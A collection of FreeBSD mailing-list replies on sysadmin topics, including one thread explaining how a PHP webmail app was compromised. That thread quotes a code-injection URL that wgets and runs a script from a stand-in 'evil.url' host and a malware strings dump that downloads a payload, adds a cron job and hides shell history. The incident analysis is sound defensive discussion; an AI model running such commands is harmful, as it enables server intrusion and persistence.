Re: questions about FreeBSD
2009/8/31 James Phillips anti_spam...@yahoo.ca: ... I have some questions about FreeBSD. The questions I had in mind are: Such general questions imply homework assignment. Indeed, I found General features (at least three)? Firewall, GUI, Networking and so on. quite amusing. I am surprised he didn't include the marking scheme for us and his teacher's email address so that we could save him the bother of handing it in. Somebody already replied with a link to the Handbook: It mainly covers installing and configuring FreeBSD. If that were the only response, he probably would have just printed the handbook out and handed it in - given the amount of effort he took to hide the fact that it was a home work question. That said, he *might* actually learn something about FreeBSD, which is probably more than can be said for the rest of his class. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: what www perl script is running?
Hi Colin.
I thought I'd just add my tuppence here. Some time ago I suffered a
similar exploit, albeit on a Linux box, with Apache and a different
PHP web app (Horde if I recall correctly).
There are a number of ways your server could have been comprised via a
PHP webapp, and a mailling list probably isn't the best place to give
you a tutorial on the likes of cross-site scripting and code injection.
What I can do is tell you roughly how my site was infected via a code
injection - to give you an idea of how important it is to learn more
about it if you are running a webserver (espescially one with third
party web apps installed).
In my case, I was able to learn quite a bit about how the exploit was
performed by looking in my Apache logs. Primarily because the attack
exploited an HTTP GET variable, so I could actually grep the name of
the script that was download from the logs. Basically all it took was
for someone to construct a URL similar to the following*:
http://www.myserver.com/vulnerable_script.php?unchecked_variable=some_value;
exec('wget http://evil.url/virus.pl -O /tmp/virus.pl');
exec('/tmp/virus.pl');
All it needs then is a bit of code on the server side which uses the
GET variable verbatum to build a line of code without checking the
variable. If the above variable were used in the construction of a
line of PHP, in an (extra) unsafe manner, you would end up with
several lines of PHP. Clearly building code from a user supplied
variable is a very bad idea, and doing so without checking the
variable... - however it isn't unheard of in the world of third
party web apps (it isn't unheard of in in-house web apps either,
however because that are not so widespread there is less chance
that the exploit will be found, and probably less to gain from
exploiting it).
The attack against your server was almost certainly automated and most
likely not even targetted at you. If you check your error logs, you
will probably see lots of 'file not found' and similar errors, testing
for vulnerabilities in ASP scripts and PHP web apps which you don't
have installed - in much the same way that you will have SSH login
failures for users who don't exist on your system.
Using an incoming and outgoing firewall is clearly a must on a
dedicated web server. Running an outgoing server on your desktop is
a bit more complicated as you would probably want to allow certain
applications to setup outgoing connections. I don't know how you
do this on a FreeBSD system.
However something that no one seems to have mentioned yet is running
an application level firewall to protect your web server, this is
particularly important if you are running popular third party web
applications. Once a flaw has been found in a popular web app, it is
very easily for the malware writers to attempt to exploit this on
thousands of webservers. A web application firewall, such as
Mod_Security for Apache (not sure what is available for lighttpd),
will check the traffic to your HTTP server for any irregularities,
known exploits and potential exploits.
HTH
Jeremy
* the URL I wrote probably isn't even valid, it is just a
demonstration, so just treat it as psuedocode.
2009/8/27 Colin Brace c...@lim.nl:
Colin Brace wrote:
ah, another directory found in /tmp with files written by www called
.bash/ Contents here:
http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz
Apropos of the contents of the above, a correspondent writes:
[...]
running 'strings' on /tmp/owned will show
HISTFILE=/dev/null
cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 21 /dev/null
cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 21 /dev/null
echo '*/1 * * * * perl /tmp/tmpfile' cron.job
crontab cron.job
rm -rf cron.job
chmod 0100 /tmp/tmpfile 21 /dev/null
perl /tmp/tmpfile 21 /dev/null
[...]
So this would be the original mischief-maker.
Just out of curiousity, can someone explain to me in basic terms how an
intruder exploits a vulnerability such as apparently existed on my system
(the RoundCube webmail package was apparently the culprit) to place the
binary file owned in /tmp and execute it?
Thanks
-
Colin Brace
Amsterdam
http://lim.nl
--
View this message in context:
http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html
Sent from the freebsd-questions mailing list archive at Nabble.com.
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: rsync or even scp questions....
How, may I ask, does this work? If you search the bash man file you can find this and lots of other useful constructs, search for 'Parameter Expansion' - I'm not sure how much of this relates to other Bourne Shell derivatives, but I don't imagine it would be difficult to test it out. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Can an Account be Locked out for ssh but allow su?
Personally I prefer AllowUsers, as that denies all users except those specifically allowed. Deny/AllowGroups are useful too. 2008/10/8 Martin McCormick [EMAIL PROTECTED] Henrik Hudson writes: Check the sshd_config man page for AllowUsers and DenyUsers directives. Many thanks. DenyUsers did the trick. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: detecting monitor's sync and refresh rate?
I cheated a little and pulled this out of openSUSE 11's monitor database:
#==
# [EMAIL PROTECTED]
#--
-- LCD:[EMAIL PROTECTED] {
Option=DPMS
Hsync=31-60
Modeline=1024x768 65.0 1024 1048 1184 1344 768 771 777 806 -hsync -vsync
Vsync=30-60
}
That should be about right for your 15 LCD monitor if it supports
[EMAIL PROTECTED] - quite common for 15 monitors. You'll notice modeline
matches the last modeline in your logs. It might not be optimal, but it
should work if your monitor is VESA compliant.
Another option, if you have the Windows driver disk, would be to extract the
.inf file and get the settings from that.
2008/10/8 Anton Shterenlikht [EMAIL PROTECTED]
On Tue, Oct 07, 2008 at 04:42:07PM -0400, Lowell Gilbert wrote:
Anton Shterenlikht [EMAIL PROTECTED] writes:
I've a monitor (Mobi M15MPC) with no docs.
I've searched the net but cannot find any info on sync and refresh rate
for it.
I've done Xorg -configure, but testing with X -config xorg.conf.new
shows screen shifted to the side and very nasty blinking, from which
I deduced that perhaps I need to specify correct sync, refresh and
mode.
Are there any commands to get sync and refresh from the monitor?
If X can't probe the monitor for its settings, I wouldn't trust any
other method of probing it either.
Not to overlook the obvious: are the settings written on the back of
the monitor?
no, nothing there.
Can I make anything from this fragment of /var/log/Xorg.0.log:
(II) intel(0): Printing DDC gathered Modelines:
(II) intel(0): Modeline 1024x768x0.0 65.00 1024 1048 1184 1184 768
771 777
806 -hsync -vsync (54.9 kHz)
(II) intel(0): Modeline 800x600x0.0 40.00 800 840 968 1056 600 601
605 628
+hsync +vsync (37.9 kHz)
(II) intel(0): Modeline 640x480x0.0 25.20 640 656 752 800 480 490 492
525
-hsync -vsync (31.5 kHz)
(II) intel(0): Modeline 720x400x0.0 28.32 720 738 846 900 400 412 414
449
-hsync +vsync (31.5 kHz)
(II) intel(0): Modeline 1024x768x0.0 65.00 1024 1048 1184 1344 768
771 777
806 -hsync -vsync (48.4 kHz)
You can always try Google...
so far no luck
thanks
anton
--
Anton Shterenlikht
Room 2.6, Queen's Building
Mech Eng Dept
Bristol University
University Walk, Bristol BS8 1TR, UK
Tel: +44 (0)117 928 8233
Fax: +44 (0)117 929 4423
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to
[EMAIL PROTECTED]
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: thorny (for me) permissions problem
4. however, after upload, the file has the ownership A:B (i.e, owned by A, group B) with permissions -rw-r--r--. So B does not have permission to delete the file. -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv Hi John. Correct me if I am wrong but permission to delete a file depends on the users permissions for the containing directory. If B has write permission on the directory then B can delete the file. However you will likely need to use 'rm -f'. Regards. Jeremy. On Tue, Oct 7, 2008 at 1:54 PM, John Almberg [EMAIL PROTECTED] wrote: The following permissions problem has me stumped: 1. User A uploads a file (using ftp) to the server, into a directory called 'data' owned by user B. Permissions on directory set to allow this, like this: drwxrwxr-x 2 user_b user_b 512 Oct 7 08:40 data 2. A cron job, run by user B, then processes the file 3. When the processing is complete, the cron job needs to delete the file from the server 4. however, after upload, the file has the ownership A:B (i.e, owned by A, group B) with permissions -rw-r--r--. So B does not have permission to delete the file. -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv The ftp user can manually change the permissions on the file to -rw-rw-r--, but I do not want to depend on the user remembering to change permissions. If he forgets, the cronjob will process the file over and over again. I need the server to handle this, so it gets done correctly 100% of the time. B does not have sufficient permissions to delete the file or change it's permissions. The only thing I can think of is to have ANOTHER cron job, run by A, run every few minutes to check for the existence of a file, and change the permissions so B can delete it. But this smells like a kludge to me. Is there a correct way to handle this? For instance, is there something I can set in A's profile, so when he uploads a file, the group permission is set to rw? That would be a nice clean way to do it, but I can't find anything like that. Any help, much appreciated. -- John ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
